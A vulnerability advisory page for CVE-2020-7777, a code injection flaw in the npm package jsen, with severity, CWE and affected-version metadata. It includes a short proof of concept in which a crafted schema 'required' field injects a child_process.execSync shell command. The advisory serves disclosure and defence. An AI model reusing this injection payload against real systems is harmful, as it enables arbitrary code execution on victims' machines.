GHSA-vm64-cfqx-3698

Suggest an improvement
Source
https://github.com/advisories/GHSA-vm64-cfqx-3698
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-vm64-cfqx-3698/GHSA-vm64-cfqx-3698.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-vm64-cfqx-3698
Aliases
  • CVE-2020-7777
Published
2022-02-10T20:18:37Z
Modified
2023-11-08T04:04:09.974138Z
Severity
  • 7.2 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
Summary
Code Injection in jsen
Details

This affects all versions of package jsen. If an attacker can control the schema file, it could run arbitrary JavaScript code on the victim machine. In the module description and README file there is no mention about the risks of untrusted schema files, so it is assumed that this is applicable. In particular the required field of the schema is not properly sanitized. The resulting string that is build based on the schema definition is then passed to a Function.apply();, leading to an Arbitrary Code Execution.

PoC

const jsen = require('jsen');
let schema = JSON.parse(
{ "type": "object", "properties": { "username": { "type": "string" } }, "required": ["\\"+process.mainModule.require(\'child_process\').execSync(\'touch malicious\')+\\""] }
);

const validate = jsen(schema); validate({});
Database specific 
{
    "github_reviewed_at": "2021-04-14T19:49:04Z",
    "github_reviewed": true,
    "severity": "HIGH",
    "nvd_published_at": "2020-11-23T16:15:00Z",
    "cwe_ids": [
        "CWE-94"
    ]
}
References

Affected packages

npm / jsen

Package

Name
jsen
View open source insights on deps.dev
Purl
pkg:npm/jsen

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
0.6.6

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-vm64-cfqx-3698/GHSA-vm64-cfqx-3698.json"